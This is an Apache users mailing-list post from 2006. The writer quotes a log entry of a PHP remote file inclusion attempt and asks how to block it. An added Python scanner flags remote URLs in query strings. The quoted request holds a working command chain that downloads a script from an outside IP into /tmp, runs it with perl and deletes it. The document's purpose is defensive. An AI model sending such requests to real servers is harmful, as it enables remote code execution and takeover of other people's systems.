Message-ID: <44D7C632.7070904@gmail.com>
Date: Tue, 08 Aug 2006 01:01:06 +0200
From: david
To: users@httpd.apache.org
Subject: [users@httpd] Question: Apache 1.3 and SetEnvIf /RedirectMatch

Hello!

Recently, I've found some entries in my Apache web server log like this:

    [IP] - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://210.204.138.43/cmd.txt?&cmd=cd%20/tmp/;GET%20http://210.204.138.43/WMNews.txt%20>%20WMNews.txt;perl%20WMNews.txt;rm%20WMNews*? HTTP/1.0" 200 220151 "-" "Mozilla/5.0"

As you can see, some attacker tries to use the index.php file to get a cmd.txt file from another site.

Is there any way to detect these URLs and stop this by configuring Apache? I've tried with SetEnvIf and RedirectMatch in several ways, with no results:

    SetEnvIf Request_URI "(.*)cmd(.*)$" attack

or

    RewriteEngine on
    RedirectMatch permanent (.*)cmd(.*)$ http://nourl

It only works with URLs like:

    http://myserver/myfile.php/cmd

not with

    http://myserver/myfile.php?cmd

It seems that Request_URI and RedirectMatch don't work with the params on the URL, only with the main URL file.

Thanks.

David

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
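
Added example, not part of the original post: a log scan showing why a pattern tested against the request path misses the logged request, and a check on the query string that flags it. The sample log lines, their addresses and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines modelled on the entry in the post; the
# addresses are documentation ranges (192.0.2.0/24, 198.51.100.0/24).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2006:02:17:47 +0200] "GET /nuke/index.php?config=1&base_datapath=http://198.51.100.7/cmd.txt?&cmd=x HTTP/1.0" 200 220151 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [05/Aug/2006:02:18:02 +0200] "GET /myfile.php/cmd HTTP/1.0" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [05/Aug/2006:02:19:30 +0200] "GET /index.php?page=news&id=4 HTTP/1.0" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.13 - - [05/Aug/2006:02:20:11 +0200] "GET /index.php?inc=hTTp%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.0" 200 300 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def split_target(line):
    """Return (path, query) taken from the logged request line."""
    m = REQUEST_RE.search(line)
    if m is None:
        return "", ""
    parts = urlsplit(m.group("target"))
    return parts.path, parts.query


def path_only_match(line, needle="cmd"):
    """A pattern tested against the path alone, as the post observed."""
    return needle in split_target(line)[0]


def remote_include_params(line):
    """Query parameters whose URL-decoded value begins with a remote URL."""
    query = split_target(line)[1]
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def scan(lines):
    """Map 1-based line number -> names of the offending parameters."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        params = remote_include_params(line)
        if params:
            hits[number] = params
    return hits


if __name__ == "__main__":
    for number, params in scan(SAMPLE_LOG).items():
        print(f"line {number}: remote URL in parameter(s) {', '.join(params)}")
```

Inside Apache, mod_rewrite exposes the same part of the request as %{QUERY_STRING} in a RewriteCond, which is where a blocking rule would test it. That variable is not URL-decoded, so a rule there has to account for percent-encoded forms as the scan above does by decoding first.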